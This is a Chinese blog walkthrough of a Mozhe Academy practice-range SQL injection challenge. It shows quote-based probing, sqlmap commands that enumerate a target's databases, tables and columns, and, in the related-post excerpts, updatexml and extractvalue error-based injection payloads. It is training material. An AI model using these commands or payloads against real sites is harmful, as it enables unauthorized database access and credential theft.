墨者-SQL注入漏洞测试(报错盲注)

已于 2022-01-30 10:53:40 修改
阅读量650 收藏 5
点赞数 3
分类专栏: 墨者 文章标签: mysql sql
于 2021-07-04 18:48:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43399807/article/details/118464043
版权

墨者-SQL注入漏洞测试

前言

本题为墨者学院在线靶场

进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点

判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。

?id=1' and 1=1 %23


当输入?id=1’ and 1=2 %23时,页面显示不正常。

由此判断注入类型为单字符注入。

一、sqlmap

首先先清理sqlmap的缓存。

python sqlmap.py --purge

查库名,得到库名为stormgroup

python sqlmap.py -u "http://219.153.49.228:44807/new_list.php?id=1" --dbs --batch


查表名,得到表名为member notice

python sqlmap.py -u "http://219.153.49.228:44807/new_list.php?id=1"  -D "stormgroup" --dbs --tables --batch

查字段名,得到字段名为name password status

python sqlmap.py -u "http://219.153.49.228:44807/new_list.php?id=1"  -D "stormgroup" -T "member" --dbs --columns --batch


最后查用户名和密码


                

                
                
        

        

    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  wh1sperZz
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    3
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    5
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  1
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
墨者学院-SQL注入漏洞测试报错盲注

				
			

			

				

					weixin_42939822的博客
				

				

					03-30
					
					5117
					
				

			

		

		

			
				
墨者学院-SQL注入漏洞测试报错盲注

			
		

	



                

              
                



	

		

			

				
					
SQL注入进阶篇——SQL盲注(基于报错

				
			

			

				

					qq_41409656的博客
				

				

					01-25
					
					4462
					
				

			

		

		

			
				
基于报错注入




报错注入原理:

  由于rand和group+by的冲突,即rand()是不可以作为order by的条件字段,同理也不可以为group by的条件字段。


  floor(rand(0)*2) 获取不确定又重复的值造成mysql的错误

  floor:向下取整,只保留整数部分,rand(0) -> 0~1

当我们在掌握了盲注的技巧后,发现

			
		

	



                


  
              

                


	

		

			

				
					
墨者SQL注入漏洞测试(报错盲注)

				
			

			

				

					wswr的博客
				

				

					03-17
					
					347
					
				

			

		

		

			
				
思路:找注入点,然后发现还是老地方,然后用 and 1=1 和 and 1=2 结果都一样,猜测应是and被过滤了,然后是用 单引号发现报错,说明注入点就在这,根据题目 报错注入,那么注入的流程就很显而易见了

首先是要知道报错注入时用的语句

' and updatexml(1,concat(0x7e,(X),0x7e),1)--+

【0x7e 其实指的就是~,在这里其实是可以随便换的,深入了解报错函数原理的话

SQL字符型注入(get)-利用updatexml函数-报错注入 - 知乎】

X就是平时

			
		

	





	

		

			

				
					
sql注入原理及各姿势sqlmap使用,2024年最新万分膜拜

				
			

			

				

					2301_76348014的博客
				

				

					04-10
					
					1196
					
				

			

		

		

			
				
外链图片转存中…(img-7TUBUIrx-1712718373873)]

			
		

	



		

			
		



	

		

			

				
					
墨者——SQL注入漏洞测试(报错盲注)

				
			

			

				

					weixin_63082823的博客
				

				

					10-11
					
					41
					
				

			

		

		

			
				
注意这个结果不完整噢,你拿去md5解密发现解不出来,数了数发现只有24位!这是因为**extractvalue函数一次只能查询32位长度**,但是吧你只求密码发现怎么样都是只有31位——

			
		

	





	

		

			

				
					
CTFHUB|SQL注入sqlmap)

				
			

			

				

					m0_60651303的博客
				

				

					07-14
					
					1172
					
				

			

		

		

			
				
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。

			
		

	





	

		

			

				
					
APP原型实例:墨者科技-旅行小蜜APP2.0.rp

				
			

			

				

					12-17
				

			

		

		

			
				
产品经理

			
		

	





	

		

			

				
					
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp

				
			

			

				

					01-06
				

			

		

		

			
				
rp原型源文件

			
		

	





	

		

			

				
					
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)

					
最新发布

				
			

			

				

					05-29
				

			

		

		

			
				
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)

			
		

	





	

		

			

				
					
WebShell文件上传漏洞分析溯源

				
			

			

				

					02-22
				

			

		

		

			
				
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。  六、WebShell 文件上传漏洞的实践案例  在这个实践案例中,我们使用...

			
		

	





	

		

			

				
					
墨者安全软件-免费杀毒软件

				
			

			

				

					11-11
				

			

		

		

			
				
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...

			
		

	





	

		

			

				
					
sql注入学习——时间盲注

				
			

			

				

					Lemon's blog
				

				

					07-28
					
					4514
					
				

			

		

		

			
				
前言:之前通过前九关学习到了回显注入、报错注入、布尔盲注等一些方法,这次就来详细的学习时间盲注

			
		

	





	

		

			

				
					
刷题笔记:SQL注入漏洞测试(报错盲注)

				
			

			

				

					m0_67399862的博客
				

				

					05-21
					
					352
					
				

			

		

		

			
				
只用and 1=2页面正常,没有报错,但在id=1后加’,会发现页面报错,说明‘与前面的’闭合了

可考虑用报错盲注



运用id=1' and extractvalue(1,concat(0x7e,database()))) --+语句来查询数据库名,即stormgroup



运用id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema...

			
		

	





	

		

			

				
					
墨者 - SQL注入漏洞测试(报错盲注)

				
			

			

				

					吃肉唐僧的博客
				

				

					07-07
					
					2671
					
				

			

		

		

			
				
根据题意,用updatexml构造报错回显' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+



爆库 ' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+



爆表' and updatexml(1,concat(0x7e,(select table_n...

			
		

	





	

		

			

				
					
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)

				
			

			

				

					kitiu666的博客
				

				

					04-26
					
					1027
					
				

			

		

		

			
				
2021年2月2日,第八次渗透测试。
这次实践SQL盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解;
测试寻找注入口:
1,、进入靶场,发现界面和之前做过的实验一样,我们需要进入“维护通知的地址”进行说起来的注入;

2、我们直接进在地址栏进行SQL语句的注入测试;
在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是一个sql 的一个注入口;(原理说明可以看我之前做过的实验博客)


sql语句注入:
3、发现了注入口

			
		

	





	

		

			

				
					
渗透测试——sql注入进阶/基于时间的盲注/一看就会/

				
			

			

				

					ChenD的学习笔记
				

				

					10-06
					
					1755
					
				

			

		

		

			
				
基于时间的盲注

			
		

	





	

		

			

				
					
渗透测试——报错注入

				
			

			

				

					zjdda的博客
				

				

					05-20
					
					815
					
				

			

		

		

			
				
1.报错注入原理
由于后台没有对数据库的信息做过滤,会输出到前台显示,那么我们就可以通过制造报错函数,将查询语句带入到数据库中,以报错信息显示出来。
2.报错注入漏洞产生的条件
1)参数用户可控:前端传入的参数内容由用户控制
2)参数带入数据库的查询:传入的参数拼接到 SQL 语句,并且带入数据库的查询
3)对用户输入的数据没有做合法性的判断
4)后台对数据库的信息没做过滤,会输出到前台显示
3.常用哪些函数来制造爆错?
extractvalue\updatexml\floor\exp

4.updatex

			
		

	





	

		

			

				
					
sql注入(2) 墨者学院之SQL手工注入漏洞测试MySQL数据库-字符型)

				
			

			

				

					c10udz的博客
				

				

					04-12
					
					4116
					
				

			

		

		

			
				
这里我们可以看到版本是10.2.15,前面说过MySQL5.0版本以上有个自带的information_shema数据库,利用这个数据库可以查到整个数据库的结构,不然就只能盲猜了。//注释:(1)information_schema.tables表示information_schena这个数据库下的表,在MySQL中【.】代表下一级。利用'order by 任意数字 %23去判断,得到4(结尾加%23的原因:在一个语句结尾时,需要用#结尾,而#的url编码就是%23)table_schema:数据库名。

			
		

	





	

		

			

				
					
墨者-sql手工注入漏洞测试

				
			

			

				

					04-29
				

			

		

		

			
				
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值